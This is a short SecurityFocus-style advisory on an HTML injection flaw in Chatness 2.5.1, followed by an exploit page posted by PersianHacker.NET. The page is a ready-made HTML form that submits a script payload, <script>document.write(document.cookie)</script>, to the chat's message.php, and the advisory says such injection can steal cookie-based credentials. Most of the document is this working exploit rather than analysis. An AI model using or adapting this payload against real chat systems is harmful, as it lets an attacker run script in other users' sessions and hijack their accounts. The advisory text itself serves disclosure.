25 lines
No EOL
1,017 B
HTML
25 lines
No EOL
1,017 B
HTML
source: http://www.securityfocus.com/bid/12929/info
|
|
|
|
Chatness is prone to an HTML injection vulnerability. This issue is exposed through various chat message form fields.
|
|
|
|
Exploitation will allow an attacker to inject hostile HTML and script code into the session of another user. An attacker could take advantage of this vulnerability to steal cookie-based authentication credentials or launch other attacks.
|
|
|
|
<html>
|
|
<head>
|
|
<title>Chatness 2.5.1 Html Injection Exploit</title>
|
|
</head>
|
|
<body>
|
|
<h1>Chatness 2.5.1 Html Injection Exploit</h1>
|
|
<form method="POST" action="http://www.example.com/message.php">
|
|
<b>XSS in message.php:</b><p>
|
|
Username:
|
|
<input type="text" name="message" size="48" value="XSS Injection Code"></p>
|
|
<p>
|
|
<br>
|
|
example: <script>document.write(document.cookie)</script></p>
|
|
<p> <input type='submit' name='login' value='RUN!' class='button'></p>
|
|
</form>
|
|
<p> </p>
|
|
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
|
|
</body>
|
|
</html> |